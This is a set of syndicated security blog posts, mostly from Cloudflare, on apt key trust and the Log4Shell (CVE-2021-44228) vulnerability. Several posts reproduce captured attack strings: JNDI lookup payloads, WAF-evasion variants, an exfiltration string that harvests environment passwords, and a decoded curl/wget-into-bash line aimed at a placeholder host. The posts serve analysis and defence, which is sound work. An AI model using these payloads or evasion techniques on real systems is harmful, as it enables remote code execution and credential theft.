At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into /etc/apt/trusted.gpg.d/. This method adds the key as a trusted root for software installation from any source. To see why this is a problem, we have to understand how apt downloads and verifies software packages.

How apt verifies packages

In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.

Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: /etc/apt/trusted.gpg. Later, as third party repositories became more common, apt could also look inside /etc/apt/trusted.gpg.d/ for individual key files.

What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.

An exposed apt signing key and how to improve apt security

A typical third-party repository today

For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:

  1. Add a file in /etc/apt/sources.list.d/ telling apt where to look for packages.
  2. Add the gpg public key to /etc/apt/trusted.gpg.d/, probably via apt-key.

If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.

What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list1:

deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free

At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.

You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it without your knowledge. An auto-update script on your laptop runs apt update. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem2.

A better way

It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to only trust that GPG key for a specific source? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:

  1. Make sure the key isn’t in /etc/apt/trusted.gpg or /etc/apt/trusted.gpg.d/ anymore. If the key is its own file, the easiest way to do this is to move it to /usr/share/keyrings/. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.
  2. Modify the sources file in /etc/apt/sources.list.d/ telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:

deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:

deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main

We’ve updated the instructions on our own repositories for the WARP Client and Cloudflare with this information, and we hope others will follow suit.

If you run apt-key list on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!

For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, it’s easy to set up, and free. You can follow this blog post to learn how to properly configure Cloudflare to cache Debian packages).


1RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.
2The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

In this blog post we will cover WAF evasion patterns and exfiltration attempts seen in the wild, trend data on attempted exploitation, and information on exploitation that we saw prior to the public disclosure of CVE-2021-44228.

In short, we saw limited testing of the vulnerability on December 1, eight days before public disclosure. We saw the first attempt to exploit the vulnerability just nine minutes after public disclosure showing just how fast attackers exploit newly found problems.

We also see mass attempts to evade WAFs that have tried to perform simple blocking, we see mass attempts to exfiltrate data including secret credentials and passwords.

WAF Evasion Patterns and Exfiltration Examples

Since the disclosure of CVE-2021-44228 (now commonly referred to as Log4Shell) we have seen attackers go from using simple attack strings to actively trying to evade blocking by WAFs. WAFs provide a useful tool for stopping external attackers and WAF evasion is commonly attempted to get past simplistic rules.

In the earliest stages of exploitation of the Log4j vulnerability attackers were using un-obfuscated strings typically starting with ${jndi:dns, ${jndi:rmi and ${jndi:ldap and simple rules to look for those patterns were effective.

Quickly after those strings were being blocked and attackers switched to using evasion techniques. They used, and are using, both standard evasion techniques (escaping or encoding of characters) and tailored evasion specific to the Log4j Lookups language.

Any capable WAF will be able to handle the standard techniques. Tricks like encoding ${ as %24%7B or \u0024\u007b are easily reversed before applying rules to check for the specific exploit being used.

However, the Log4j language has some rich functionality that enables obscuring the key strings that some WAFs look for. For example, the ${lower} lookup will lowercase a string. So, ${lower:H} would turn into h. Using lookups attackers are disguising critical strings like jndi helping to evade WAFs.

In the wild we are seeing use of ${date}, ${lower}, ${upper}, ${web}, ${main} and ${env} for evasion. Additionally, ${env}, ${sys} and ${main} (and other specialized lookups for Docker, Kubernetes and other systems) are being used to exfiltrate data from the target process’ environment (including critical secrets).

To better understand how this language is being used, here is a small Java program that takes a string on the command-line and logs it to the console via Log4j:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4jTester{
    private static final Logger logger = LogManager.getLogger(log4jTester.class);
       
    public static void main(String[] args) {
	logger.error(args[0]);
    }
}

This simple program writes to the console. Here it is logging the single word hide.

$ java log4jTester.java 'hide'          
01:28:25.606 [main] ERROR log4jTester - hide

The Log4j language allows use of the ${} inside ${} thus attackers are able to combine multiple different keywords for evasion. For example, the following ${lower:${lower:h}}${lower:${upper:i}}${lower:D}e would be logged as the word hide. That makes it easy for an attacker to evade simplistic searching for ${jndi, for example, as the letters of jndi can be hidden in a similar manner.

$ java log4jTester.java '${lower:${lower:h}}${lower:${upper:i}}${lower:d}e'
01:30:42.015 [main] ERROR log4jTester - hide

The other major evasion technique makes use of the :- syntax. That syntax enables the attacker to set a default value for a lookup and if the value looked up is empty then the default value is output. So, for example, looking up a non-existent environment variable can be used to output letters of a word.

$ java log4jTester.java '${env:NOTEXIST:-h}i${env:NOTEXIST:-d}${env:NOTEXIST:-e}' 
01:35:34.280 [main] ERROR log4jTester - hide

Similar techniques are in use with ${web}, ${main}, etc. as well as strings like ${::-h} or ${::::::-h} which both turn into h. And, of course, combinations of these techniques are being put together to make more and more elaborate evasion attempts.

To get a sense for how evasion has taken off here’s a chart showing un-obfuscated ${jndi: appearing in WAF blocks (the orange line), the use of the ${lower} lookup (green line), use of URI encoding (blue line) and one particular evasion that’s become popular ${${::-j}${::-n}${::-d}${::-i}(red line).

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

For the first couple of days evasion was relatively rare. Now, however, although naive strings like ${jndi: remain popular evasion has taken off and WAFs must block these improved attacks.

We wrote last week about the initial phases of exploitation that were mostly about reconnaissance. Since then attackers have moved on to data extraction.

We see the use of ${env} to extract environment variables, and ${sys} to get information about the system on which Log4j is running. One attack, blocked in the wild, attempted to exfiltrate a lot of data from various Log4j lookups:

${${env:FOO:-j}ndi:${lower:L}da${lower:P}://x.x.x.x:1389/FUZZ.HEADER.${docker:
imageName}.${sys:user.home}.${sys:user.name}.${sys:java.vm.version}.${k8s:cont
ainerName}.${spring:spring.application.name}.${env:HOSTNAME}.${env:HOST}.${ctx
:loginId}.${ctx:hostName}.${env:PASSWORD}.${env:MYSQL_PASSWORD}.${env:POSTGRES
_PASSWORD}.${main:0}.${main:1}.${main:2}.${main:3}}

There you can see the user, home directory, Docker image name, details of Kubernetes and Spring, passwords for the user and databases, hostnames and command-line arguments being exfiltrated.

Because of the sophistication of both evasion and exfiltration WAF vendors need to be looking at any occurrence of ${ and treating it as suspicious. For this reason, we are additionally offering to sanitize any logs we send our customer to convert ${ to x{.

The Cloudflare WAF team is continuously working to block attempted exploitation but it is still vital that customers patch their systems with up to date Log4j or apply mitigations. Since data that is logged does not necessarily come via the Internet systems need patching whether they are Internet-facing or not.

All paid customers have configurable WAF rules to help protect against CVE-2021-44228, and we have also deployed protection for our free customers.

Cloudflare quickly put in place WAF rules to help block these attacks. The following chart shows how those blocked attacks evolved.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

From December 10 to December 13 we saw the number of blocks per minute ramp up as follows.

Date Mean blocked requests per minute
2021-12-10 5,483
2021-12-11 18,606
2021-12-12 27,439
2021-12-13 24,642

In our initial blog post we noted that Canada (the green line below) was the top source country for attempted exploitation. As we predicted that did not continue and attacks are coming from all over the wild, either directly from servers or via proxies.

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

Exploitation of CVE-2021-44228 prior to disclosure

CVE-2021-44228 was disclosed in a (now deleted) Tweet on 2021-12-09 14:25 UTC:

Exploitation of Log4j CVE-2021-44228 before public disclosure and evolution of evasion and exfiltration

However, our systems captured three instances of attempted exploitation or scanning on December 1, 2021 as follows. In each of these I have obfuscated IP addresses and domain names. These three injected ${jndi:ldap} lookups in the HTTP User-Agent header, the Referer header and in URI parameters.

2021-12-01 03:58:34
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://rb3w24.example.com/x}
Referer: /${jndi:ldap://rb3w24.example.com/x}
Path: /$%7Bjndi:ldap://rb3w24.example.com/x%7D

2021-12-01 04:36:50
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://y3s7xb.example.com/x}
Referer: /${jndi:ldap://y3s7xb.example.com/x}
Parameters: x=$%7Bjndi:ldap://y3s7xb.example.com/x%7D						

2021-12-01 04:20:30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
    (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 ${jndi:ldap://vf9wws.example.com/x}
Referer: /${jndi:ldap://vf9wws.example.com/x}	
Parameters: x=$%7Bjndi:ldap://vf9wws.example.com/x%7D	

After those three attempts we saw no further activity until nine minutes after public disclosure when someone attempts to inject a ${jndi:ldap} string via a URI parameter on a gaming website.

2021-12-09 14:34:31
Parameters: redirectUrl=aaaaaaa$aadsdasad$${jndi:ldap://log4.cj.d.example.com/exp}

Conclusion

CVE-2021-44228 is being actively exploited by a large number of actors. WAFs are effective as a measure to help prevent attacks from the outside, but they are not foolproof and attackers are actively working on evasions. The potential for exfiltration of data and credentials is incredibly high and the long term risks of more devastating hacks and attacks is very real.

It is vital to mitigate and patch affected software that uses Log4j now and not wait.

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

Post Syndicated from Jon Levine original https://blog.cloudflare.com/log4j-cloudflare-logs-mitigation/

Sanitizing Cloudflare Logs to protect customers from the Log4j vulnerability

On December 9, 2021, the world learned about CVE-2021-44228, a zero-day exploit affecting the Apache Log4j utility.  Cloudflare immediately updated our WAF to help protect against this vulnerability, but we recommend customers update their systems as quickly as possible.

However, we know that many Cloudflare customers consume their logs using software that uses Log4j, so we are also mitigating any exploits attempted via Cloudflare Logs. As of this writing, we are seeing the exploit pattern in logs we send to customers up to 1000 times every second.

Starting immediately, customers can update their Logpush jobs to automatically redact tokens that could trigger this vulnerability. You can read more about this in our developer docs or see details below.

How the attack works

You can read more about how the Log4j vulnerability works in our blog post here. In short, an attacker can add something like ${jndi:ldap://example.com/a} in any string. Log4j will then make a connection on the Internet to retrieve this object.

Cloudflare Logs contain many string fields that are controlled by end-users on the public Internet, such as User Agent and URL path. With this vulnerability, it is possible that a malicious user can cause a remote code execution on any system that reads these fields and uses an unpatched instance of Log4j.

Our mitigation plan

Unfortunately, just checking for a token like ${jndi:ldap is not sufficient to protect against this vulnerability. Because of the expressiveness of the templating language, it’s necessary to check for obfuscated variants as well. Already, we are seeing attackers in the wild use variations like ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}.  Thus, redacting the token ${ is the most general way to defend against this vulnerability.

The token ${ appears up to 1,000 times per second in the logs we currently send to customers. A spot check of some records shows that many of them are not attempts to exploit this vulnerability. Therefore we can’t safely redact our logs without impacting customers who may expect to see this token in their logs.

Starting now, customers can update their Logpush jobs to redact the string ${ and replace it with x{ everywhere.

To enable this, customers can update their Logpush job options configuration to include the parameter CVE-2021-44228=true. For detailed instructions on how to do this using the Logpush API, see our developer documentation.

Zabbix NOT AFFECTED by the Log4j exploit

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/zabbix-not-affected-by-the-log4j-exploit/17873/

A newly revealed vulnerability impacting Apache Log4j 2 versions 2.0 to 2.14.1 was disclosed on GitHub on 9 December 2021 and registered as CVE-2021-44228 with the highest severity rating. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. By utilizing this vulnerability, a remote attacker could take control of the affected system.

Zabbix is aware of this vulnerability, has completed verification, and can conclude that the only product where we use Java is Zabbix Java Gateway, which does not utilize the log4j library, thereby is not impacted by this vulnerability.

For customers, who use the log4j library with other Java applications, here are some proactive measures, which they can take to reduce the risk posed by CVE-2021-44228:

  • Upgrade to Apache log4j-2.1.50.rc2, as all prior 2.x versions are vulnerable.
  • For Log4j version 2.10.0 or later, block JNDI from making requests to untrusted servers by setting the configuration value log4j2.formatMsgNoLookups to “TRUE” to prevent LDAP and other queries.
  • Default both com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to “FALSE” to prevent Remote Code Execution attacks in Java 8u121.

Updates to Cloudflare Security and Privacy Certifications and Reports

Post Syndicated from Ling Wu original https://blog.cloudflare.com/updates-to-cloudflare-security-and-privacy-certifications-and-reports/

Updates to Cloudflare Security and Privacy Certifications and Reports

Updates to Cloudflare Security and Privacy Certifications and Reports

Cloudflare’s products and services are protecting more customers than ever with significant expansion over the past year. Earlier this week, we launched Cloudflare Security Center so customers can map their attack surface, review potential security risks and threats to their organization, and have generally fast tracked many offerings to meet the needs of customers.

This rapid expansion has meant ensuring our security, privacy, and risk posture grew accordingly. Customer confidence in our ability to handle their sensitive information in an ever-changing regulatory landscape has to be as solid as our offerings, so we have expanded the scope of our previously-existing compliance validations; not only that, we’ve also managed to obtain a couple of new ones.

What’s New

We’ve had a busy year and focused on our commitment to privacy as well as complying to one of the most rigorous security standards in the industry. We are excited about the following achievements in 2021:

Updates to Cloudflare Security and Privacy Certifications and Reports

FedRAMP In Process – Cloudflare hit a major milestone by being listed on the FedRAMP Marketplace as ‘In Process’ for receiving an agency authorization at a moderate baseline. Once an Authorization to Operate (ATO) is granted, it will allow agencies and other cloud service providers to leverage our product and services in a public sector capacity.

Updates to Cloudflare Security and Privacy Certifications and Reports

ISO 27701:2019 (International Standards Organization) – Cloudflare is one of the first companies in the industry to achieve ISO 27701 certification as both a data processor and controller. The certification provides assurance to our customers that we have a formal privacy program that is aligned to GDPR.

Updates to Cloudflare Security and Privacy Certifications and Reports

Self-Serve Compliance Documentation – Pro, Business, and Enterprise customers now have the ability to obtain a copy of Cloudflare’s certifications, reports, and overview through the Cloudflare Dashboard.

Security Certifications & Reports

Cloudflare understands the importance of maintaining compliance to industry standards, certifications, and reports. Our customers rely on the certifications we have to ensure secure and private handling of their data. Each year, the security team expands the scope of these validations to ensure that all of our applicable products and services are included.  Cloudflare has met the requirements of the following standards:

Updates to Cloudflare Security and Privacy Certifications and Reports

SOC-2 Type II / SOC 3 (Service Organizations Controls) – Cloudflare maintains SOC reports that include the security, confidentiality, and availability trust principles. The SOC-2 report provides assurance that our products and underlying infrastructure are secure and highly available while protecting the confidentiality of our customer’s data. We engage with our third-party assessors on an annual basis, and the report provided to our customers covers a period of one full year.

Updates to Cloudflare Security and Privacy Certifications and Reports

ISO 27001:2013 (International Standards Organization) – Cloudflare’s ISO certification covers our entire platform. Customers can be assured that Cloudflare has a formal information security management program that adheres to a globally recognized standard.

Updates to Cloudflare Security and Privacy Certifications and Reports

PCI Data Security Standard (DSS) – Cloudflare engages with a QSA (Qualified Security Assessor) on an annual basis to evaluate us as a Level 1 Merchant and a Service Provider. This way, we can assure our customers that we meet the requirements to transmit their payment data securely. As a service provider, our customers can trust Cloudflare’s products to meet requirements of the DSS and transmit cardholder data securely through our services.

Updates to Cloudflare Security and Privacy Certifications and Reports

HIPAA/HITECH Act (Health Insurance Portability and Accountability Act/Health Information Technology for Economic and Clinical Health – Covered healthcare entities that are leveraging our enterprise version of our security products to protect their application layer can be assured that Cloudflare can sign Business Associates Agreements (BAA).

Updates to Cloudflare Security and Privacy Certifications and Reports

1.1.1.1 Public DNS Resolver Privacy Examination – Cloudflare conducted a first-of-its-kind privacy examination by a leading accounting firm to determine whether the 1.1.1.1 resolver was effectively configured to meet Cloudflare’s privacy commitments. A public summary of the assessment can be found here.

What’s on our Roadmap?

As a global company, Cloudflare partners with industry experts and regional leaders around the world to determine the best ways to build customer trust. Our infoshare events with existing customers and participation in standards organizations guide our methods to continuously improve the security and privacy posture of our products and services. Part of that improvement is obtaining additional third party validations. At this time, we are evaluating ISO 27018 to give customers additional assurance that we meet industry standards for handling personal data in our cloud platform. We will continue to move forward in our FedRAMP journey. And of course, we are continuously evaluating a range of other region-specific certifications. For the latest information about our certifications and reports, please visit our trust hub.

If you are an existing customer and want to give us feedback about a validation, please contact your Account Executive and let them know! We will continue to pursue validations that support our customers’ needs and make the internet safer and more secure.

Secure how your servers connect to the Internet today

Post Syndicated from Sam Rhea original https://blog.cloudflare.com/secure-how-your-servers-connect-to-the-internet-today/

Secure how your servers connect to the Internet todaySecure how your servers connect to the Internet today

The vulnerability disclosed yesterday in the Java-based logging package, log4j, allows attackers to execute code on a remote server. We’ve updated Cloudflare’s WAF to defend your infrastructure against this 0-day attack. The attack also relies on exploiting servers that are allowed unfettered connectivity to the public Internet. To help solve that challenge, your team can deploy Cloudflare One today to filter and log how your infrastructure connects to any destination.

Securing traffic inbound and outbound

You can read about the vulnerability in more detail in our analysis published earlier today, but the attack starts when an attacker adds a specific string to input that the server logs. Today’s updates to Cloudflare’s WAF block that malicious string from being sent to your servers. We still strongly recommend that you patch your instances of log4j immediately to prevent lateral movement.

If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server. The destination of the malicious server could be any arbitrary URL. Attackers who control that URL can then respond to the request with arbitrary code that the server can execute.

At the time of this blog, it does not appear any consistent patterns of malicious hostnames exist like those analyzed in the SUNBURST attack. However, any server or network with unrestricted connectivity to the public Internet is a risk for this specific vulnerability and others that rely on exploiting that open window.

First, filter and log DNS queries with two-clicks

From what we’re observing in early reports, the vulnerability mostly relies on connectivity to IP addresses. Cloudflare’s network firewall, the second step in this blog, focuses on that level of security. However, your team can adopt a defense-in-depth strategy by deploying Cloudflare’s protective DNS resolver today to apply DNS filtering to add security and visibility in minutes to any servers that need to communicate out to the Internet.

If you configure Cloudflare Gateway as the DNS resolver for those servers, any DNS query they make to find the IP address of a given host, malicious or not, will be sent to a nearby Cloudflare data center first. Cloudflare runs the world’s fastest DNS resolver so that you don’t have to compromise performance for this level of added safety and logging. When that query arrives, Cloudflare’s network can then:

  • filter your DNS queries to block the resolution of queries made to known malicious destinations, and
  • log every query if you need to investigate and audit after potential events.
Secure how your servers connect to the Internet today

Alternatively, if you know every host that your servers need to connect to, you can create a positive security model with Cloudflare Gateway. In this model, your resource can only send DNS queries to the domains that you provide. Queries to any other destinations, including new and arbitrary ones like those that could be part of this attack, will be blocked by default.

> Ready to get started today? You can begin filtering and logging all of the DNS queries made by your servers or your entire network with these instructions here.

Second, secure network traffic leaving your infrastructure

Protective DNS filtering can add security and visibility in minutes, but bad actors can target all of the other ways that your servers communicate out to the rest of the Internet. Historically, organizations deployed network firewalls in their data centers to filter the traffic entering and exiting their network. Their teams ran capacity planning exercises, purchased the appliances, and deployed hardware. Some of these appliances eventually moved to the cloud, but the pain of deployment stayed mostly the same.

Cloudflare One’s network firewall helps your team secure all of your network’s traffic through a single, cloud-native, solution that does not require that you need to manage any hardware or any virtual appliances. Deploying this level of security only requires that you decide how you want to send traffic to Cloudflare. You can connect your network through multiple on-ramp options, including network layer (GRE or IPsec tunnels), direct connections, and a device client.

Secure how your servers connect to the Internet today

Once connected, traffic leaving your network will first route through a Cloudflare data center. Cloudflare’s network will apply filters at layers 3 through 5 of the OSI model. Your administrators can then create policies based on IP, port, protocol in both stateless and stateful options. If you want to save even more time, Cloudflare uses the data we have about threats on the Internet to create managed lists for you that you can block with a single click.

Similar to DNS queries, if you know that your servers and services in your network only need to reach specific IPs or ports, you can build a positive security model with allow-list rules that restrict connections and traffic to just the destinations you specify. In either model, Cloudflare’s network will handle logging for you. Your team can export these logs to your SIEM for audit retention or additional analysis if you need to investigate a potential attack.

> Ready to get started securing your network? Follow the guide here and tell us you’d like to get started and we’ll be ready to help your team.

Third, inspect and filter HTTP traffic

Some attacks will rely on convincing your servers and endpoints to send HTTP requests to specific destinations, leaking data or grabbing malware to download in your infrastructure. To help solve that challenge, you can layer HTTP inspection, virus scanning, and logging in Cloudflare’s network.

If you completed Step Two above, you can use the same on-ramp that you configured to upgrade UPD and TCP traffic where Cloudflare’s Secure Web Gateway can apply HTTP filtering and logging to the requests leaving your network. If you need more granular control, you can deploy Cloudflare’s client software to build rules that only apply to specific endpoints in your infrastructure.

Like every other layer in this security model, you can also only allow your servers to connect to an approved list of destinations. Cloudflare’s Secure Web Gateway will allow and log those requests and block attempts to reach any other destinations.

Secure how your servers connect to the Internet today

> Ready to begin inspecting and filtering HTTP traffic? Follow the instructions here to get started today.

What’s next?

Deploying filtering and logging today will help protect against the next attack or attempts to continue to exploit today’s vulnerability, but we’re encouraging everyone to start by patching your deployments of log4j immediately.

As we write this, we’re updating existing managed rulesets to include reports of destinations used to attempt to exploit today’s vulnerability. We’ll continue to update those policies as we learn more information.

Actual CVE-2021-44228 payloads captured in the wild

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/

Actual CVE-2021-44228 payloads captured in the wild

I wrote earlier about how to mitigate CVE-2021-44228 in Log4j, how the vulnerability came about and Cloudflare’s mitigations for our customers. As I write we are rolling out protection for our FREE customers as well because of the vulnerability’s severity.

As we now have many hours of data on scanning and attempted exploitation of the vulnerability we can start to look at actual payloads being used in wild and statistics. Let’s begin with requests that Cloudflare is blocking through our WAF.

We saw a slow ramp up in blocked attacks this morning (times here are UTC) with the largest peak at around 1800 (roughly 20,000 blocked exploit requests per minute). But scanning has been continuous throughout the day. We expect this to continue.

Actual CVE-2021-44228 payloads captured in the wild

We also took a look at the number of IP addresses that the WAF was blocking. Somewhere between 200 and 400 IPs appear to be actively scanning at any given time.

Actual CVE-2021-44228 payloads captured in the wild

So far today the largest number of scans or exploitation attempts have come from Canada and then the United States.

Actual CVE-2021-44228 payloads captured in the wild

Lots of the blocked requests appear to be in the form of reconnaissance to see if a server is actually exploitable. The top blocked exploit string is this (throughout I have sanitized domain names and IP addresses):

${jndi:ldap://x.x.x.x/#Touch}

Which looks like a simple way to hit the server at x.x.x.x, which the actor no doubt controls, and log that an Internet property is exploitable. That doesn’t tell the actor much. The second most popular request contained this:

Mozilla/5.0 ${jndi:ldap://x.x.x.x:5555/ExploitD}/ua

This appeared in the User-Agent field of the request. Notice how at the end of the URI it says /ua. No doubt a clue to the actor that the exploit worked in the User-Agent.

Another interesting payload shows that the actor was detailing the format that worked (in this case a non-encrypted request to port 443 and they were trying to use http://):

${jndi:http://x.x.x.x/callback/https-port-443-and-http-callback-scheme}

Someone tried to pretend to be the Googlebot and included some extra information.

Googlebot/2.1 (+http://www.google.com/bot.html)${jndi:ldap://x.x.x.x:80/Log4jRCE}

In the following case the actor was hitting a public Cloudflare IP and encoded that IP address in the exploit payload. That way they could scan many IPs and find out which were vulnerable.

${jndi:ldap://enq0u7nftpr.m.example.com:80/cf-198-41-223-33.cloudflare.com.gu}

A variant on that scheme was to include the name of the attacked website in the exploit payload.

${jndi:ldap://www.blogs.example.com.gu.c1me2000ssggnaro4eyyb.example.com/www.blogs.example.com}

Some actors didn’t use LDAP but went with DNS. However, LDAP is by far the most common protocol being used.

${jndi:dns://aeutbj.example.com/ext}

A very interesting scan involved using Java and standard Linux command-line tools. The payload looks like this:

${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN1cmwgLXMgeC54LngueDo1ODc0L3kueS55Lnk6NDQzfHx3Z2V0IC1xIC1PLSB4LngueC54OjU4NzQveS55LnkueTo0NDMpfGJhc2g=}

The base64 encoded portion decodes to a curl and wget piped into bash.

(curl -s x.x.x.x:5874/y.y.y.y:443||wget -q -O- x.x.x.x:5874/y.y.y.y:443)|bash

Note that the output from the curl/wget is not required and so this is just hitting a server to indicate to the actor that the exploit worked.

Lastly, we are seeing active attempts to evade simplistic blocking of strings like ${jndi:ldap by using other features of Log4j. For example, a common evasion technique appears to be to use the ${lower} feature (which lowercases characters) as follows:

${jndi:${lower:l}${lower:d}a${lower:p}://example.com/x

At this time there appears to be a lot of reconnaissance going on. Actors, good and bad, are scanning for vulnerable servers across the world. Eventually, some of that reconnaissance will turn into actual penetration of servers and companies. And, because logging is so deeply embedded in front end and back end systems, some of that won’t become obvious for hours or days.

Like spores quietly growing underground some will break through the soil and into the light.

Actual CVE-2021-44228 payloads captured in the wild

Cloudflare’s security teams are working continuously as the exploit attempts evolve and will update WAF and firewall rules as needed.

Inside the log4j2 vulnerability (CVE-2021-44228)

Post Syndicated from John Graham-Cumming original https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/

Inside the log4j2 vulnerability (CVE-2021-44228)

Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.

It is CVE-2021-44228 and affects version 2 of log4j between versions 2.0-beta-9 and 2.14.1. It is not present in version 1 of log4j and is patched in 2.15.

In this post we explain the history of this vulnerability, how it was introduced, how Cloudflare is protecting our clients. We will update later with actual attempted exploitation we are seeing blocked by our firewall service.

Cloudflare uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.

But, if you work for a company that is using Java-based software that uses log4j you should immediately read the section on how to mitigate and protect your systems before reading the rest.

How to Mitigate CVE-2021-44228

To mitigate the following options are available (see the advisory from Apache here):

1. Upgrade to log4j v2.15

2. If you are using log4j v2.10 or above, and cannot upgrade, then set the property

log4j2.formatMsgNoLookups=true

3. Or remove the JndiLookup class from the classpath. For example, you can run a command like

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

to remove the class from the log4j-core.

Vulnerability History

In 2013, in version 2.0-beta9, the log4j package added the “JNDILookup plugin” in issue LOG4J2-313. To understand how that change creates a problem, it’s necessary to understand a little about JNDI: Java Naming and Directory Interface.

JNDI has been present in Java since the late 1990s. It is a directory service that allows a Java program to find data (in the form of a Java object) through a directory. JNDI has a number of service provider interfaces (SPIs) that enable it to use a variety of directory services.

For example, SPIs exist for the CORBA COS (Common Object Service), the Java RMI (Remote Method Interface) Registry and LDAP. LDAP is a very popular directory service (the Lightweight Directory Access Protocol) and is the primary focus of CVE-2021-44228 (although other SPIs could potentially also be used).

A Java program can use JNDI and LDAP together to find a Java object containing data that it might need. For example, in the standard Java documentation there’s an example that talks to an LDAP server to retrieve attributes from an object. It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server running on the same machine (localhost) on port 389 and goes on to read attributes from it.

As the tutorial says “If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL”. Thus the LDAP server could be running on a different machine and potentially anywhere on the Internet. That flexibility means that if an attacker could control the LDAP URL they’d be able to cause a Java program to load an object from a server under their control.

That’s the basics of JNDI and LDAP; a useful part of the Java ecosystem.

But in the case of log4j an attacker can control the LDAP URL by causing log4j to try to write a string like ${jndi:ldap://example.com/a}. If that happens then log4j will connect to the LDAP server at example.com and retrieve the object.

This happens because log4j contains special syntax in the form ${prefix:name} where prefix is one of a number of different Lookups where name should be evaluated. For example, ${java:version} is the current running version of Java.

LOG4J2-313 added a jndi Lookup as follows: “The JndiLookup allows variables to be retrieved via JNDI. By default the key will be prefixed with java:comp/env/, however if the key contains a “:” no prefix will be added.”

With a : present in the key, as in ${jndi:ldap://example.com/a} there’s no prefix and the LDAP server is queried for the object. And these Lookups can be used in both the configuration of log4j as well as when lines are logged.

